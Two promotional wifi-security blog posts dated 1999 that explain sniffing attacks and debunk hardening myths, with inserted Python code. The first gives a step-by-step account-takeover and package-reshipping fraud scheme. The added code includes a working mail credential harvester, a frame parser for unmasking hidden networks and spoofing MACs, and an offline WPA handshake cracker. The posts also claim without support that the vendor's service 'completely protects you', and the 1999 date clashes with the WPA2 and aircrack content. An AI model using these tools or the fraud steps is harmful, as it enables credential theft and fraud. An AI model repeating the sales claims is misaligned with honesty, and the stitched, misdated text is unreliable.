Wireless Network Identity Theft Example (technical)

Tuesday, November 30th, 1999

This is an Identity Theft example where a wireless hacker gains access to all your online accounts when you read your email over a wireless network.

Before you read any further, note that Wireless Personal Secure (Wifi Security Guy’s wireless security service) completely protects you and if you were using it the following would not happen to you. Click here to get this amazing protection or to learn more about it.

Setting: you use a wireless network (with or without a password) and check your email.

  1. If this network has a password on it, the hacker has already captured traffic with kismet and cracked the key with airsnort or aircrack (WEP falls in minutes; a WPA passphrase falls only if it is guessable). More than likely this network doesn't have a password on it at all - over 80% of them don't.
  2. Using kismet the hacker watches you check your email. Kismet records every packet you send on the network to a capture file.
  3. If your mail client logs in without TLS (plain POP3, IMAP or SMTP), that capture contains the email server you connected to and the login name and password you sent to it, in clear text. A client that uses TLS (POP3S, IMAPS or STARTTLS) gives the sniffer nothing but ciphertext.
  4. The hacker lets kismet collect wifi packets for several hours, usually during the peak times this wifi network is in use. If this is a nearby hotel the hacker collects packets through the evening; if it's a cafe or sandwich shop the hacker collects packets during lunch.
  5. The hacker goes back home and runs dsniff on the capture files that kismet created. Dsniff dumps out all the servers and name/password combinations that kismet collected that day.
  6. The hacker takes your server and login name/password and sets up his own email client to download all your email into a special folder. You are completely unaware he's doing any of this.
  7. The hacker monitors your email for several weeks, taking note of all the emails you get from online stores, and compiles a list of the stores that send you email.
  8. After several weeks of silently collecting your emails and making a list of where you have shopped, the hacker is ready to strike.
  9. The hacker goes to each of your stores and has your password reset. To do this all he has to do is enter your email address and click "forgot password". The online stores quickly oblige him by sending a new password (or a reset link) to your email, which the hacker is receiving. The hacker takes note of each new password and quickly deletes those emails from your email server so you never see them.
  10. The hacker then returns to each of the stores with the new passwords and places orders.
  11. The hacker has the items sent to a different address, usually an apartment complex where UPS/FedEx just knock on the door and drop the package off.
  12. One thing about online stores these days: they don't charge your card until the merchandise is ready to ship. The hacker will have the packages overnighted (why not, it's not his money...) which means your card is charged and he receives the goods the very next day.
  13. Most people won't be aware they've even been charged until it's too late - the hacker has long since picked up the packages and can't be caught.
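What step 5 amounts to, as an added example that is not part of the original post or of the Wireless Personal Secure service: a small credential harvester over the client side of reassembled mail sessions, doing for POP3, IMAP and SMTP what dsniff does on a capture. The servers, ports, account names and passwords in it are constructed for the demo; the session on port 993 is a TLS record, included to show that an encrypted login gives the sniffer nothing to read.

```python
# Added example, not from the original post: the credential dump that dsniff
# performs on a kismet capture, reduced to the three mail protocols involved.
# Input is the client-to-server side of each TCP session (already reassembled).
# All servers, ports, names and passwords below are constructed for the demo.
import base64
import binascii


def extract_pop3(lines):
    """POP3 sends USER <name> then PASS <password> as two clear-text lines."""
    user = None
    for line in lines:
        parts = line.split(" ", 1)
        cmd = parts[0].upper()
        if cmd == "USER" and len(parts) == 2:
            user = parts[1].strip()
        elif cmd == "PASS" and len(parts) == 2 and user:
            return (user, parts[1].strip())
    return None


def extract_imap(lines):
    """IMAP: '<tag> LOGIN <user> <password>', arguments optionally quoted."""
    for line in lines:
        parts = line.split()
        if len(parts) == 4 and parts[1].upper() == "LOGIN":
            return (parts[2].strip('"'), parts[3].strip('"'))
    return None


def _b64(s):
    try:
        return base64.b64decode(s, validate=True)
    except (binascii.Error, ValueError):
        return None


def extract_smtp(lines):
    """SMTP AUTH PLAIN carries base64(authzid NUL user NUL password), either on
    the AUTH line or on the next one; AUTH LOGIN sends base64 user and password
    on the two following lines."""
    it = iter(lines)
    for line in it:
        parts = line.split()
        if len(parts) < 2 or parts[0].upper() != "AUTH":
            continue
        mech = parts[1].upper()
        if mech == "PLAIN":
            blob = _b64(parts[2] if len(parts) > 2 else next(it, ""))
            if blob and blob.count(b"\x00") == 2:
                _, user, password = blob.split(b"\x00")
                return (user.decode(), password.decode())
        elif mech == "LOGIN":
            user, password = _b64(next(it, "")), _b64(next(it, ""))
            if user and password:
                return (user.decode(), password.decode())
    return None


# Clear-text ports only. 995, 993 and 465 (and anything after STARTTLS) carry
# TLS records, so there is nothing for a sniffer to read there.
EXTRACTORS = {110: extract_pop3, 143: extract_imap, 25: extract_smtp, 587: extract_smtp}


def harvest(sessions):
    """sessions: iterable of (server, port, client_payload_bytes).
    Returns [(server, port, user, password), ...] for every clear-text login."""
    found = []
    for server, port, payload in sessions:
        extractor = EXTRACTORS.get(port)
        if extractor is None:
            continue
        try:
            text = payload.decode("ascii")
        except UnicodeDecodeError:
            continue  # binary payload (e.g. a TLS record) on a clear-text port
        cred = extractor(text.splitlines())
        if cred:
            found.append((server, port, cred[0], cred[1]))
    return found


# Constructed sessions standing in for what kismet would have captured.
SAMPLE_SESSIONS = [
    ("mail.example.com", 110, b"USER alice@example.com\r\nPASS hunter2\r\nSTAT\r\nQUIT\r\n"),
    ("imap.example.com", 143, b'a001 LOGIN "bob" "s3cret"\r\na002 SELECT INBOX\r\n'),
    ("smtp.example.com", 587, b"EHLO laptop\r\nAUTH PLAIN "
     + base64.b64encode(b"\x00carol\x00letmein") + b"\r\n"),
    ("imap.example.com", 993, b"\x16\x03\x01\x00\x5a\x01\x00\x00\x56\x03\x03"),  # TLS ClientHello
]

if __name__ == "__main__":
    for server, port, user, password in harvest(SAMPLE_SESSIONS):
        print(f"{server}:{port} {user} / {password}")
```

Running it lists the three clear-text logins and nothing for the TLS session, which is exactly the line between a mail setup that this attack works against and one it doesn't.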

Take note, all it took was the hacker gaining access to one thing (your email in this example). That’s how hackers work, they only need access to one thing, and from that they figure out how to gain access to other things. Another thing to note. The hacker never had to know your credit card numbers.

There are more complicated examples than this one, but this is certainly one of the easiest to understand.

Remember, on an open wireless network (or one whose key the hacker has already cracked) everything you send can be seen by anyone else in the area unless the application itself encrypts it (HTTPS, TLS for mail, a VPN). All it takes is one person deciding to record your activity and you can fall victim to identity theft very easily.

Identity Theft And A False Sense Of Security - Wifi

Tuesday, November 30th, 1999

This article addresses a number of so-called security measures that “experts” say will help secure your wireless network from illegal access and Identity Theft. We list why these security measures don’t work and what you should really be doing to secure your wireless networks.

Before you read any further, note that Wireless Personal Secure (Wifi Security Guy’s wireless security service) completely protects you and if you were using it you wouldn’t have to worry about any of the following “security measures” (although you could do them if you wanted - even though as you’ll see, they don’t work). Click here to get this amazing protection or to learn more about it.

With Identity Theft being the fastest growing crime (according to the FBI), the growth of Identity Theft by wireless networks (millions reported in the past few years), and the ubiquity of wireless networking, there's a lot of misinformation floating around out there where so-called "experts" give advice on how to secure wireless networks. A lot of the advice gives only a false sense of security, and since the average wifi user is not technically proficient enough to know what advice works and what doesn't, we list the gamut of advice here, tell you if it doesn't work (and why), and what action you should take in each case.

1. Change the default SSID.

The SSID (Service Set Identifier) gives the name of a particular wireless network. When someone comes over to your house and is going to use your wireless network you tell them the name (SSID) of the network and the password (I hope you have a password on it!!).

Every wireless access point comes with a "factory default" SSID, usually the name of the manufacturer (LINKSYS, NETGEAR, D-LINK, etc), and it is good advice to change the SSID, but by itself it keeps nobody out. A network with an SSID you made up is just as easy to join as one still using the SSID that came from the factory, because the name is never secret. The one place the SSID does matter is WPA/WPA2 with a pre-shared key: the SSID is mixed into the key derivation (it is the salt for the passphrase), so a hacker who has captured your connection can test guesses against a default SSID like "linksys" with tables computed in advance, while a unique SSID forces him to start from scratch.

Action: Change your SSID to something unique, but don't think that changing the SSID hides your network or keeps anyone out. Don't change the SSID to your name, your address, your phone number, etc. - the problem with doing that is you let any passerby know exactly which wireless network they see in their scan is yours.

Additional Note: This measure wouldn’t protect you from Identity Theft on your wireless network. You need the protection of a service like our Wireless Personal Secure.

2. Setting up MAC filtering.

Every network device (access point, laptop, computer, etc) has a MAC address (Media Access Control address). Without diving down into a lot of network theory: the MAC address is burned into your computer's wireless card at the factory, but the operating system can override it with any value it likes. When you are using your home network you may have one IP address, and when you go to your local cafe you will more than likely get a different IP address, but your MAC stays the same unless you change it - it identifies your card on whatever wireless network you join.

MAC filtering is where you configure your wireless router to only allow certain MACs on the network, and it ignores all the rest. At first this may seem like a really good idea - a hacker driving by can't use your network now, right? WRONG!

A hacker driving by will be using a sniffer tool like kismet, and kismet lists every MAC address in use on your wireless network; the addresses sit in the clear in every frame header even when the network is encrypted. The hacker then sets his own card to use your MAC instead of the one that came on it (a one-line change on any modern operating system, with ifconfig, ip link or macchanger). From that point forward your wireless router can't tell the difference between your computer and the hacker's computer.

MAC filtering is easily bypassed by a hacker. Additionally, every time a friend comes over who wants to legitimately use your wireless network you have to add their MAC to your filter list. It’s just not worth your time.

Action: None, MAC filtering adds no benefit to securing your network, it just adds an administrative burden to you every time a visitor drops by.

Additional Note: This measure wouldn’t protect you from Identity Theft on your wireless network. You need the protection of a service like our Wireless Personal Secure.

3. Disable SSID broadcast.

Wireless routers ordinarily broadcast their SSID (name) in a beacon frame roughly ten times a second (the default beacon interval is about 100 ms). Your computer uses those beacons to know which wireless networks are in the area and join them (if you've configured that network in the past, usually your computer will automatically join it when it sees it). When you turn off the SSID broadcast, the router still sends beacons, just with the name blanked out. Now your computer won't automatically find the network; you have to tell it "connect to my wireless network", and it then sends a probe request that says, in the clear, "hey, is network XYZ around here?" The router answers with a probe response that carries the name, your computer sends the name again in its association request, and it joins the network.

I hope you saw the flaw(s). A minor flaw is that you have to manually join the network any time you want to use it. A major flaw is the SSID goes over the air in the clear anyway, every time your computer joins. All a hacker has to do is wait around for your computer to join the network to pick up the SSID, then he can join (or try to join) too. And he doesn't have to wait: he can send forged "deauthenticate" frames, which your network cannot tell from the real thing, so your computer "drops off" the wireless network, and when it rejoins within a few seconds he sees the SSID. He basically "forced" you into telling him the SSID.
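Sections 2 and 3 both come down to what a sniffer reads out of 802.11 frame headers, which are never encrypted. The following is an added example, not code from the original post or from kismet: a passive parser over a handful of frames constructed inline (the BSSID, the client MACs and the SSID "homewifi" are made up) that lists the client MACs a MAC filter would admit and recovers the name of a network whose beacons hide it, from the client's probe request and the router's probe response.

```python
# Added example, not from the original post: a passive 802.11 header parser that
# recovers what kismet shows a hacker sitting nearby. It needs no radio; the
# frames are constructed inline, and the MAC addresses and SSID are made up.
# Data frames reveal the BSSID and the client MACs that a MAC filter admits
# (section 2); probe requests and responses reveal the SSID of a "hidden"
# network whose beacons carry an empty SSID field (section 3).
from collections import defaultdict

TYPE_MGMT, TYPE_DATA = 0, 2
PROBE_REQ, PROBE_RESP, BEACON = 4, 5, 8
BROADCAST = b"\xff" * 6


def mac_str(raw):
    return ":".join(f"{b:02x}" for b in raw)


def parse_ies(body):
    """Information elements: 1-byte id, 1-byte length, value. SSID is id 0."""
    ies, i = {}, 0
    while i + 2 <= len(body):
        eid, ln = body[i], body[i + 1]
        ies[eid] = body[i + 2:i + 2 + ln]
        i += 2 + ln
    return ies


def parse_frame(frame):
    """Decode the fixed MAC header and the fields a sniffer cares about."""
    fc, flags = frame[0], frame[1]
    ftype, subtype = (fc >> 2) & 0x3, fc >> 4
    to_ds, from_ds = flags & 0x1, (flags >> 1) & 0x1
    a1, a2, a3 = frame[4:10], frame[10:16], frame[16:22]
    body = frame[30:] if (to_ds and from_ds) else frame[24:]   # 4-address form is longer
    rec = {"type": ftype, "subtype": subtype}
    if ftype == TYPE_MGMT:
        # Management frames: addr2 = sender, addr3 = BSSID
        rec["sa"], rec["bssid"] = mac_str(a2), mac_str(a3)
        if subtype in (BEACON, PROBE_RESP):
            body = body[12:]  # skip timestamp(8), interval(2), capability(2)
        if subtype in (BEACON, PROBE_RESP, PROBE_REQ):
            ssid = parse_ies(body).get(0, b"")
            # A hidden network beacons with a zero-length (or all-NUL) SSID
            rec["ssid"] = ssid.decode("utf-8", "replace") if ssid.strip(b"\x00") else None
    elif ftype == TYPE_DATA:
        if to_ds and not from_ds:      # station -> AP: addr1 = BSSID, addr2 = station
            rec["bssid"], rec["station"] = mac_str(a1), mac_str(a2)
        elif from_ds and not to_ds:    # AP -> station: addr1 = station, addr2 = BSSID
            rec["bssid"], rec["station"] = mac_str(a2), mac_str(a1)
    return rec


def inventory(frames):
    """Returns (networks, probes): per-BSSID SSIDs, client MACs and hidden flag,
    and per-client SSIDs they asked for by name in probe requests."""
    networks = defaultdict(lambda: {"ssids": set(), "clients": set(), "hidden": False})
    probes = defaultdict(set)
    for frame in frames:
        r = parse_frame(frame)
        if r["type"] == TYPE_MGMT:
            if r["subtype"] == BEACON:
                net = networks[r["bssid"]]
                if r["ssid"] is None:
                    net["hidden"] = True
                else:
                    net["ssids"].add(r["ssid"])
            elif r["subtype"] == PROBE_RESP and r["ssid"]:
                networks[r["bssid"]]["ssids"].add(r["ssid"])
            elif r["subtype"] == PROBE_REQ and r["ssid"]:
                probes[r["sa"]].add(r["ssid"])   # the client names the hidden SSID in the clear
        elif r["type"] == TYPE_DATA and "station" in r:
            networks[r["bssid"]]["clients"].add(r["station"])
    return dict(networks), dict(probes)


# --- constructed frames (made-up addresses) ---------------------------------
def mgmt_frame(subtype, da, sa, bssid, body):
    return bytes([(subtype << 4) | (TYPE_MGMT << 2), 0]) + b"\x00\x00" + da + sa + bssid + b"\x00\x00" + body


def data_frame(to_ds, a1, a2, a3):
    return bytes([TYPE_DATA << 2, 0x01 if to_ds else 0x02]) + b"\x00\x00" + a1 + a2 + a3 + b"\x00\x00" + b"\xaa\xaa"


AP, CLIENT1, CLIENT2 = bytes.fromhex("001a2b3c4d5e"), bytes.fromhex("00e0ab112233"), bytes.fromhex("0016b6445566")
FIXED = b"\x00" * 8 + b"\x64\x00" + b"\x11\x04"        # timestamp, 100 TU interval, capability
SAMPLE_FRAMES = [
    mgmt_frame(BEACON, BROADCAST, AP, AP, FIXED + b"\x00\x00"),                 # beacon with hidden SSID
    mgmt_frame(PROBE_REQ, BROADCAST, CLIENT1, BROADCAST, b"\x00\x08homewifi"),  # client asks for it by name
    mgmt_frame(PROBE_RESP, CLIENT1, AP, AP, FIXED + b"\x00\x08homewifi"),       # AP answers with the name
    data_frame(True, AP, CLIENT2, bytes.fromhex("001122334455")),               # client2 -> AP
    data_frame(False, CLIENT1, AP, bytes.fromhex("001122334455")),              # AP -> client1
]

if __name__ == "__main__":
    nets, probes = inventory(SAMPLE_FRAMES)
    for bssid, n in nets.items():
        print(bssid, "hidden" if n["hidden"] else "", sorted(n["ssids"]), sorted(n["clients"]))
    print("probed:", probes)
```

The output shows one hidden network, its name recovered twice (from the client's probe and the router's reply), and the two client MACs that a MAC filter on that router must already allow.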

Action: None. Not broadcasting the SSID only complicates your use of the wireless network without adding any security.

Additional Note: This measure wouldn’t protect you from Identity Theft on your wireless network. You need the protection of a service like our Wireless Personal Secure.

4. Hard-code IP addresses instead of using DHCP.

DHCP stands for Dynamic Host Configuration Protocol. It’s a network administrator’s dream, and sometimes also their nightmare. Basically every computer on the network has to have an IP address. In the “old” days (pre DHCP) an administrator had to manually assign every computer on the network an IP address and make sure that none of the IP addresses overlapped (two computers with the same address). Most computers can’t handle having the same IP address that another computer has (more on this in a bit).

DHCP allows a computer to “ask” the network for an IP address whenever it connects. So when a computer joins the network it “asks” “hey, I’m new around here, can I get an IP address?” A DHCP server then says back “yes, you can have this IP: XXX.XXX.XXX.XXX”. This saves the network administrator the irritation of having to assign IPs to every computer, the DHCP server does it for him.

By turning off DHCP, the computers all have to be manually configured with different IP addresses. The idea behind turning off DHCP on a wireless network is that a hacker’s computer that connects to the network now won’t be automatically given an IP and then “can’t access the network”.

A hacker’s approach to this “problem” is to do similar to the MAC address hack. He just watches the network, sees what IPs are in use and then assigns himself one manually. If he uses a new IP but still can’t use the wireless network, he can assume it’s because the router also blocks any IPs that aren’t in it’s list, just like the MAC filtering. So he can do the same as he did for the MAC filtering hack, he just assigns the same MAC and IP of a computer that is on the network to his own computer. He can also setup his computer to not have a problem with there being another computer on the network with the same IP and now the network is wide-open to him.

Action: None. Turning off DHCP and doing IP filtering is just going to give you a headache every time a friend comes over, you have to walk him through all the steps of manually configuring his own IP as well as set up your router to now allow that IP to access the network. And all that trouble for a hacker to just side-step this “security” measure just isn’t worth it.

Additional Note: This measure wouldn’t protect you from Identity Theft on your wireless network. You need the protection of a service like our Wireless Personal Secure.

5. WEP Encryption.

OK, this and WPA encryption are going to be the biggies. Everybody just assumes "oh, they work, they'll secure me." Bad news - the final analysis is they don't ensure your security. WEP stands for Wired Equivalent Privacy - its name claims "WEP is just as secure as using a wired network". But don't believe its name; it's far from being as secure as a wired network.

I'm not going to get into all the complexities of explaining how WEP is insecure. Let me summarize with a layman's-terms approach to WEP. With WEP you basically have a pre-shared key (40 or 104 bits) that everyone on the network uses. Whenever data is going to be sent on the wireless network the computer takes a 24-bit IV (Initialization Vector), sticks it in front of the pre-shared key, and uses the result as the key for the RC4 stream cipher, which produces a keystream that is XORed with the data. The IV is supposed to change with every packet so that no two packets use the same keystream - the down side is that the IV is sent along with the data, in the clear. There are only about 16 million possible IVs (2^24), so on a busy network they start to repeat within hours, and any two packets sent under the same IV share a keystream: XOR the two packets together and the keystream cancels out. Worse, RC4 leaks information about its key when certain "weak" IVs are used. Once a hacker has collected enough packets (tens of thousands with the newer statistical attacks, and he can inject traffic to speed that up) the pre-shared key itself can be calculated in a matter of seconds. A busy network using WEP can be broken into within a matter of minutes.

Action: Turn on WEP if that's all you have (it at least stops the casual passerby), but better yet, if that's all you have, upgrade your router.

Additional Note: Since WEP doesn’t protect you from Identity Theft on your wireless network, you need the protection of a service like our Wireless Personal Secure.

6. WPA Encryption.

WPA (Wi-Fi Protected Access) was created to answer the vulnerabilities in WEP. I'll try to keep this as simple as possible; suffice it to say WPA has real strengths over WEP but, with a poorly chosen passphrase, can still be broken and shouldn't be trusted alone.

The full standard couldn't be implemented with older network cards, and in the rush to secure wireless, WPA was released as a subset that would run on WEP-era hardware. WPA2 is the full implementation of the IEEE 802.11i standard. For the purposes of this article WPA will refer to both WPA and WPA2 from this point forward; we don't want to muddy the waters by always pointing out their differences, and for the high-level view of WPA security it's not necessary.

The original WPA (also called TKIP) keeps WEP's RC4 cipher so that old cards could run it, but fixes the things that sank WEP: a much larger pre-shared key, a 48-bit per-packet counter in place of the 24-bit IV, a per-packet key mixing step so the raw key never goes near the cipher, and a real message integrity check (Michael) instead of WEP's CRC. WPA2 replaces RC4 entirely with AES (CCMP). Both also support 802.1X/EAP (Extensible Authentication Protocol), which lets different manufacturers and cryptography companies plug in their own authentication methods and gives every user an individual key. The problem the general public has with EAP is that it takes an additional authentication (RADIUS) server, so the general public ends up using "WPA-Personal" with a single pre-shared key derived from a passphrase.

WPA also has one weakness that WEP doesn't have. When a client joins (or rejoins), it and the router exchange a four-packet "handshake" to prove they both know the key and to agree on fresh per-session keys. Those four packets, which are sent in the clear, contain everything a hacker needs to test passphrase guesses offline at his leisure; no further contact with your network is needed. This is significant because (a) the weakest point of WPA is when clients are connecting, and (b) a hacker doesn't have to wait for it: he can send forged "deauthenticate" packets that kick every client off the network and force them to rejoin, handing him a fresh handshake on demand. If your passphrase is a dictionary word or something short, he'll have it in minutes; if it's long and random, the same attack becomes hopeless. (Original WPA/TKIP additionally shuts the network down for sixty seconds and rekeys everyone if it sees two failed integrity checks within a minute, which is a denial-of-service lever, not a way in.)
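The handshake attack described above, and the SSID-as-salt point from section 1, as an added example that is not part of the original post or of any product: the real WPA/WPA2-Personal key derivation (PBKDF2 for the PMK, the 802.11i PRF for the PTK, the EAPOL-Key MIC) plus an offline dictionary check against a handshake message constructed in the script. The SSID "linksys", the MAC addresses, nonces, passphrase and word list are made up; the PMK for passphrase "password" on SSID "IEEE" is the test vector from the 802.11i standard.

```python
# Added example, not from the original post: WPA/WPA2-Personal key derivation
# and the offline guess-and-check that a captured 4-way handshake allows. It
# also shows why the SSID matters (section 1): it is the PBKDF2 salt. The
# algorithms are the IEEE 802.11i ones (PBKDF2-HMAC-SHA1 PMK, PRF-512 PTK,
# EAPOL-Key MIC); the SSID, MACs, nonces, passphrase and word list are made up.
import hashlib
import hmac

MIC_OFFSET = 81  # EAPOL header (4) + Key Descriptor fields preceding the MIC


def derive_pmk(passphrase, ssid):
    """PMK = PBKDF2-HMAC-SHA1(passphrase, salt=SSID, 4096 rounds, 32 bytes).
    Same passphrase + different SSID = different PMK, so tables precomputed for
    "linksys" or "NETGEAR" are useless against a network with a unique name."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf_512(key, label, data):
    """802.11i PRF: concatenated HMAC-SHA1(key, label || 0x00 || data || counter)."""
    blocks = [hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
              for i in range(4)]
    return b"".join(blocks)[:64]


def derive_ptk(pmk, ap_mac, sta_mac, anonce, snonce):
    """PTK from the PMK and the four public handshake values (both MACs, both
    nonces), all of which a sniffer sees. The first 16 bytes are the KCK."""
    data = (min(ap_mac, sta_mac) + max(ap_mac, sta_mac)
            + min(anonce, snonce) + max(anonce, snonce))
    return prf_512(pmk, b"Pairwise key expansion", data)


def eapol_mic(kck, eapol_frame):
    """WPA2 (key descriptor version 2): HMAC-SHA1 over the EAPOL-Key frame with
    the MIC field zeroed, truncated to 16 bytes. Original WPA uses HMAC-MD5."""
    return hmac.new(kck, eapol_frame, hashlib.sha1).digest()[:16]


def eapol_msg2(snonce):
    """Minimal EAPOL-Key message 2 (station -> AP) with a zeroed MIC field."""
    body = (b"\x02"            # descriptor type: RSN
            + b"\x01\x0a"      # key info: version 2, pairwise, MIC present
            + b"\x00\x10"      # key length
            + b"\x00" * 8      # replay counter
            + snonce           # station nonce
            + b"\x00" * 16 + b"\x00" * 8 + b"\x00" * 8   # IV, RSC, ID
            + b"\x00" * 16     # MIC (zero while computing)
            + b"\x00\x00")     # key data length
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def station_msg2(ssid, passphrase, ap_mac, sta_mac, anonce, snonce):
    """What the real station transmits: message 2 with the MIC filled in."""
    frame = eapol_msg2(snonce)
    kck = derive_ptk(derive_pmk(passphrase, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
    mic = eapol_mic(kck, frame)
    return frame[:MIC_OFFSET] + mic + frame[MIC_OFFSET + 16:]


def crack(ssid, ap_mac, sta_mac, anonce, snonce, captured_msg2, wordlist):
    """Offline: for each guess derive PMK -> PTK -> KCK, recompute the MIC and
    compare with the captured one. No further radio contact is needed, which
    is why the handshake is the weak point and passphrase strength decides."""
    captured_mic = captured_msg2[MIC_OFFSET:MIC_OFFSET + 16]
    zeroed = captured_msg2[:MIC_OFFSET] + b"\x00" * 16 + captured_msg2[MIC_OFFSET + 16:]
    for guess in wordlist:
        kck = derive_ptk(derive_pmk(guess, ssid), ap_mac, sta_mac, anonce, snonce)[:16]
        if hmac.compare_digest(eapol_mic(kck, zeroed), captured_mic):
            return guess
    return None


# Constructed capture: a station joining "linksys" with a weak passphrase.
AP_MAC, STA_MAC = bytes.fromhex("001a2b3c4d5e"), bytes.fromhex("00e0ab112233")
ANONCE, SNONCE = bytes(range(32)), bytes(range(32, 64))
CAPTURED = station_msg2("linksys", "sunshine1", AP_MAC, STA_MAC, ANONCE, SNONCE)

if __name__ == "__main__":
    # IEEE 802.11i Annex H test vector: passphrase "password", SSID "IEEE"
    print(derive_pmk("password", "IEEE").hex())
    print(crack("linksys", AP_MAC, STA_MAC, ANONCE, SNONCE, CAPTURED,
                ["password", "letmein", "sunshine1", "correcthorse"]))
```

Each guess costs 4096 HMAC-SHA1 rounds, so the attacker's speed is a few thousand guesses per second per CPU core (far more on a GPU): fine against a word list, useless against a long random passphrase. Note that the same capture tested with the wrong SSID never matches, which is the whole reason a unique SSID defeats precomputed tables.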

Action: Use WPA2 with AES (CCMP) and a long, random passphrase (not a word, a name or a date), and if possible invest in a more secure 802.1X/EAP-based solution (WPA2-Enterprise).

Additional Note: Since WPA2 with a guessable passphrase can be broken and leaves you vulnerable to Identity Theft on your wireless network, you need the protection of a service like our Wireless Personal Secure.

Hey, have some other security “advice” you’ve been given? Want to run it by the real experts and see if it’s good or not? Drop me a line and we’ll add it to this article!